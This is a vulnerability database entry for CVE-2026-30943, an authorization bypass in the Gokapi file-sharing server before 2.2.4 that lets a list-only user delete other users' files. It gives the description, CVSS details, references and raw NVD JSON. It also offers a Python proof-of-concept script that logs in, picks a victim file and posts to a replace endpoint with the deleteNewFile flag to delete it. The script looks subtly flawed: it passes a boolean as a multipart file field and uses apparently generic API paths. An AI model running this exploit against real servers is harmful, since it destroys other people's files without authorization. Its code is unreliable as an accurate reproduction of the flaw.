CVE-2026-30943

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An insufficient authorization check in the file replace API allows a user with only list visibility permission (UserPermListOtherUploads) to delete another user's file by abusing the deleteNewFile flag, bypassing the requirement for UserPermDeleteOtherUploads. This vulnerability is fixed in 2.2.4.

CVSS Details

CVSS Score

4.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:* - VULNERABLE

Gokapi < 2.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-30943 PoC
# Gokapi < 2.2.4 Authorization Bypass via File Replace API

target_url = "http://target-server:53842"

# Authentication - user with only UserPermListOtherUploads
auth_data = {
    "username": "attacker",
    "password": "password123"
}

# Step 1: Login to obtain session
login_url = f"{target_url}/api/v1/login"
session = requests.Session()
login_response = session.post(login_url, json=auth_data)

if login_response.status_code != 200:
    print("[-] Login failed")
    exit(1)

print("[+] Login successful")

# Step 2: List files to find victim's file ID
list_url = f"{target_url}/api/v1/files"
files_response = session.get(list_url)
files = files_response.json()

if not files or len(files) == 0:
    print("[-] No files found")
    exit(1)

# Get first victim's file ID
victim_file_id = files[0]["id"]
print(f"[+] Found victim file: {victim_file_id}")

# Step 3: Exploit - Replace file with deleteNewFile flag to delete victim's file
replace_url = f"{target_url}/api/v1/files/{victim_file_id}/replace"
exploit_data = {
    "deleteNewFile": True,  # Key parameter for exploitation
    "file": ("malicious.txt", b"exploited", "text/plain")
}

exploit_response = session.post(replace_url, files=exploit_data)

if exploit_response.status_code == 200:
    print("[+] File deleted successfully - Authorization bypassed!")
else:
    print(f"[-] Exploitation failed: {exploit_response.status_code}")
    print(exploit_response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30943
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30943
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30943/
[4] VulDB https://vuldb.com/cve/CVE-2026-30943
[5] https://github.com/Forceu/Gokapi/releases/tag/v2.2.4
[6] https://github.com/Forceu/Gokapi/security/advisories/GHSA-j6jp-78w8-34x6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30943", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:35.573", "lastModified": "2026-03-17T13:48:39.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An insufficient authorization check in the file replace API allows a user with only list visibility permission (UserPermListOtherUploads) to delete another user's file by abusing the deleteNewFile flag, bypassing the requirement for UserPermDeleteOtherUploads. This vulnerability is fixed in 2.2.4."}, {"lang": "es", "value": "Gokapi es un servidor de intercambio de archivos autoalojado con soporte para expiración automática y cifrado. Antes de la versión 2.2.4, una comprobación de autorización insuficiente en la API de reemplazo de archivos permite a un usuario con solo permiso de visibilidad de lista (UserPermListOtherUploads) eliminar el archivo de otro usuario abusando del flag deleteNewFile, eludiendo el requisito de UserPermDeleteOtherUploads. Esta vulnerabilidad se corrigió en la versión 2.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.4", "matchCriteriaId": "CE6F3F4D-D449-43DD-BB3D-86F98581926C"}]}]}], "references": [{"url": "https://github.com/Forceu/Gokapi/releases/tag/v2.2.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-j6jp-78w8-34x6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}